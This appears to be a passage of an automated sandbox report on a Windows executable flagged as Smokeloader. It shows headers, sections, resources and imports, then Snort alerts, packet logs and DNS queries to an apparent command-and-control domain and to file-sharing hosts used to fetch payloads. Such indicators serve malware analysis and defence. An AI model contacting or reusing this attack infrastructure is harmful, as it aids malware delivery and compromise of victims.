mov ebp, esp
sub esp, 00000328h
mov eax, dword ptr [00414454h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
and dword ptr [ebp-00000328h], 00000000h
push ebx
push 0000004Ch
lea eax, dword ptr [ebp-00000324h]
push 00000000h
push eax
call 00007FEF60A9BDA2h
lea eax, dword ptr [ebp-00000328h]
mov dword ptr [ebp-000002D8h], eax
lea eax, dword ptr [ebp-000002D0h]
add esp, 0Ch
mov dword ptr [ebp+00FFFD2Ch], eax

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x12784	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42d000	0x24378	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x452000	0xba0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11d0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2cb8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x184	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x12066	0x12200	False	0.5797279094827587	data	6.691650867340855	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x14000	0x418fc8	0x19000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42d000	0x24378	0x24400	False	0.6327653556034483	data	6.386559817005297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x452000	0x422a	0x4400	False	0.150390625	data	1.731638841465645	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x44f138	0x2	data	Setsuana	South Africa
AFX_DIALOG_LAYOUT	0x44f120	0x2	data	Setsuana	South Africa
AFX_DIALOG_LAYOUT	0x44f110	0xe	data	Setsuana	South Africa
AFX_DIALOG_LAYOUT	0x44f100	0xe	data	Setsuana	South Africa
AFX_DIALOG_LAYOUT	0x44f128	0xe	data	Setsuana	South Africa
GIFOGIDICUBOTOVUKEFORAVOLIDESEF	0x44cab0	0x629	ASCII text, with very long lines (1577), with no line terminators	Setsuana	South Africa
KIFIYUMITUYIZUREL	0x44c2d8	0x7d1	ASCII text, with very long lines (2001), with no line terminators	Setsuana	South Africa
YELALASEYUGUBAHOP	0x44d0e0	0x1f9c	ASCII text, with very long lines (8092), with no line terminators	Setsuana	South Africa
RT_CURSOR	0x44f140	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0	Setsuana	South Africa
RT_CURSOR	0x44f470	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	Setsuana	South Africa
RT_CURSOR	0x44f5c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_CURSOR	0x450470	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x42dd50	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x42ebf8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x42f4a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x42fa08	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x431fb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x433058	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x4339e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x433eb0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x434d58	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x435600	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x437ba8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x438c50	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x439108	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x439fb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x43a858	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x43adc0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x43d368	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x43e410	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x43ed98	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x43f268	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Setsuana	South Africa
RT_ICON	0x440110	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Setsuana	South Africa
RT_ICON	0x4409b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Setsuana	South Africa
RT_ICON	0x441080	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Setsuana	South Africa
RT_ICON	0x4415e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Setsuana	South Africa
RT_ICON	0x443b90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Setsuana	South Africa
RT_ICON	0x444c38	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Setsuana	South Africa
RT_ICON	0x4455c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Setsuana	South Africa
RT_ICON	0x445aa0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x446948	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x4471f0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x4478b8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x447e20	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x44a3c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x44b470	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x44bdf8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa
RT_STRING	0x450f30	0x442	data	Setsuana	South Africa
RT_ACCELERATOR	0x44f080	0x40	data	Setsuana	South Africa
RT_GROUP_CURSOR	0x44f5a0	0x22	data	Setsuana	South Africa
RT_GROUP_CURSOR	0x450d18	0x22	data	Setsuana	South Africa
RT_GROUP_ICON	0x433e48	0x68	data	Setsuana	South Africa
RT_GROUP_ICON	0x4390b8	0x4c	data	Setsuana	South Africa
RT_GROUP_ICON	0x43f200	0x68	data	Setsuana	South Africa
RT_GROUP_ICON	0x445a28	0x76	data	Setsuana	South Africa
RT_GROUP_ICON	0x44c260	0x76	data	Setsuana	South Africa
RT_VERSION	0x450d40	0x1f0	MS Windows COFF PowerPC object file	Setsuana	South Africa
None	0x44f0d0	0xa	data	Setsuana	South Africa
None	0x44f0c0	0xa	data	Setsuana	South Africa
None	0x44f0e0	0xa	data	Setsuana	South Africa
None	0x44f0f0	0xa	data	Setsuana	South Africa

Imports

DLL

Import

KERNEL32.dll

GetComputerNameA, SetProcessAffinityMask, WriteConsoleOutputCharacterA, OpenJobObjectA, GetCommState, AddConsoleAliasW, CreateHardLinkA, GetSystemDefaultLCID, GetModuleHandleW, GetConsoleAliasesA, WaitNamedPipeW, LoadLibraryW, CopyFileW, GetFileAttributesA, GetFileAttributesW, WriteConsoleW, GetVolumePathNameA, GetPrivateProfileIntW, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, GetModuleHandleA, CreateMutexA, FindNextFileW, GetStringTypeW, GetFileAttributesExW, SetFileShortNameA, GetVolumeNameForVolumeMountPointW, LCMapStringW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, RtlUnwind, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, HeapReAlloc, CloseHandle, CreateFileA, SetStdHandle, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetLocaleInfoA, FlushFileBuffers, GetConsoleOutputCP, SetEndOfFile, GetProcessHeap, ReadFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
Setsuana	South Africa

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.377.232.37.22849729802851815 11/19/22-10:38:14.789628	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49729	80	192.168.2.3	77.232.37.228
192.168.2.377.232.37.22849733802851815 11/19/22-10:38:20.903452	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49733	80	192.168.2.3	77.232.37.228
192.168.2.377.232.37.22849725802851815 11/19/22-10:38:10.657737	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49725	80	192.168.2.3	77.232.37.228
192.168.2.389.208.107.21649738802018581 11/19/22-10:38:23.294845	TCP	2018581	ET TROJAN Single char EXE direct download likely trojan (multiple families)	49738	80	192.168.2.3	89.208.107.216

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2022 10:37:51.845873117 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:51.908421040 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.908559084 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:51.908721924 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:51.908723116 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:51.971393108 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.979885101 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.979959011 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980001926 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980045080 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980077028 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:51.980113983 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:51.980151892 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980194092 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980237961 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:51.980257034 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980298996 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980341911 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:51.980359077 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980402946 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:51.980447054 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.042936087 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043060064 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043106079 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043148041 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043189049 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043230057 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043272972 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043304920 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.043359041 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043401003 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043442965 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043495893 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043507099 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.043550014 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043571949 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.043612003 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043638945 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.043677092 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043720007 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043765068 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.043782949 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043843985 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043864012 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.043910980 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.043976068 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.044011116 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.044044018 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.044106007 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.106694937 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106735945 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106751919 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106765032 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106777906 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106794119 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106828928 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106846094 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106869936 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106910944 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.106930017 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.106949091 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106971025 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106988907 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.106998920 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107016087 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107033014 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107044935 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107058048 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107075930 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107085943 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107103109 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107119083 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107126951 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107144117 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107160091 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107171059 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107186079 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107206106 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107212067 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107228994 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107244968 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107253075 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107265949 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107283115 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107295990 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107309103 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107316971 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107333899 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107342005 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107357979 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107377052 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107382059 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107399940 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107408047 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107424974 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107441902 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107454062 CET	49702	80	192.168.2.3	77.232.37.228
Nov 19, 2022 10:37:52.107465982 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107482910 CET	80	49702	77.232.37.228	192.168.2.3
Nov 19, 2022 10:37:52.107491970 CET	49702	80	192.168.2.3	77.232.37.228

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 19, 2022 10:37:51.433576107 CET	192.168.2.3	8.8.8.8	0xde57	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:52.290333033 CET	192.168.2.3	8.8.8.8	0x6ed	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:52.727514982 CET	192.168.2.3	8.8.8.8	0xb42c	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:53.275449991 CET	192.168.2.3	8.8.8.8	0x3f2a	Standard query (0)	srshf.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:54.221432924 CET	192.168.2.3	8.8.8.8	0xb96b	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:54.780044079 CET	192.168.2.3	8.8.8.8	0xb58b	Standard query (0)	iplogger.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:54.952774048 CET	192.168.2.3	8.8.8.8	0xadca	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:55.115462065 CET	192.168.2.3	8.8.8.8	0xe594	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:55.278120995 CET	192.168.2.3	8.8.8.8	0x8e00	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:55.443361044 CET	192.168.2.3	8.8.8.8	0xd493	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:55.848453999 CET	192.168.2.3	8.8.8.8	0x20c4	Standard query (0)	1ecosolution.it	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:03.417083025 CET	192.168.2.3	8.8.8.8	0x8bf5	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:03.578258038 CET	192.168.2.3	8.8.8.8	0xf694	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.012542009 CET	192.168.2.3	8.8.8.8	0xb8a2	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.179675102 CET	192.168.2.3	8.8.8.8	0x921c	Standard query (0)	cdn-102.anonfiles.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.402832031 CET	192.168.2.3	8.8.8.8	0xb4b4	Standard query (0)	anonfiles.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.594675064 CET	192.168.2.3	8.8.8.8	0xd613	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.767508030 CET	192.168.2.3	8.8.8.8	0x3427	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.926534891 CET	192.168.2.3	8.8.8.8	0xf816	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.481759071 CET	192.168.2.3	8.8.8.8	0xdbc8	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:09.012053967 CET	192.168.2.3	8.8.8.8	0x5215	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:09.198158979 CET	192.168.2.3	8.8.8.8	0xf417	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:10.570333958 CET	192.168.2.3	8.8.8.8	0x1f89	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:10.754020929 CET	192.168.2.3	8.8.8.8	0x9505	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:10.966792107 CET	192.168.2.3	8.8.8.8	0x729c	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:11.164679050 CET	192.168.2.3	8.8.8.8	0x18e2	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:14.707420111 CET	192.168.2.3	8.8.8.8	0xf502	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:14.869998932 CET	192.168.2.3	8.8.8.8	0xc662	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:15.042428970 CET	192.168.2.3	8.8.8.8	0x79af	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:15.238451004 CET	192.168.2.3	8.8.8.8	0x4cf3	Standard query (0)	hoteldostyk.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:20.819649935 CET	192.168.2.3	8.8.8.8	0x17f0	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:21.034486055 CET	192.168.2.3	8.8.8.8	0x3ce7	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:21.249598980 CET	192.168.2.3	8.8.8.8	0x7709	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:22.885689974 CET	192.168.2.3	8.8.8.8	0x88fc	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:23.094655037 CET	192.168.2.3	8.8.8.8	0xe063	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:25.949970007 CET	192.168.2.3	8.8.8.8	0x6f70	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.010088921 CET	192.168.2.3	8.8.8.8	0x8425	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.258568048 CET	192.168.2.3	8.8.8.8	0x5b74	Standard query (0)	cdn-104.anonfiles.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.536580086 CET	192.168.2.3	8.8.8.8	0xe85a	Standard query (0)	anonfiles.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.761984110 CET	192.168.2.3	8.8.8.8	0x7097	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:28.066414118 CET	192.168.2.3	8.8.8.8	0x699e	Standard query (0)	u.to	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:28.602567911 CET	192.168.2.3	8.8.8.8	0x8382	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.239953995 CET	192.168.2.3	8.8.8.8	0xf8cc	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.435972929 CET	192.168.2.3	8.8.8.8	0xa3aa	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.613445044 CET	192.168.2.3	8.8.8.8	0x140	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.890120029 CET	192.168.2.3	8.8.8.8	0x10c6	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:30.736552000 CET	192.168.2.3	8.8.8.8	0x350b	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:30.898178101 CET	192.168.2.3	8.8.8.8	0x4ee1	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.088722944 CET	192.168.2.3	8.8.8.8	0xe6ab	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.256349087 CET	192.168.2.3	8.8.8.8	0x15a9	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.377008915 CET	192.168.2.3	8.8.8.8	0xa5d6	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:32.301501989 CET	192.168.2.3	8.8.8.8	0xdb7a	Standard query (0)	o36fafs3sn6xou.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:40.929582119 CET	192.168.2.3	8.8.8.8	0xc0c4	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
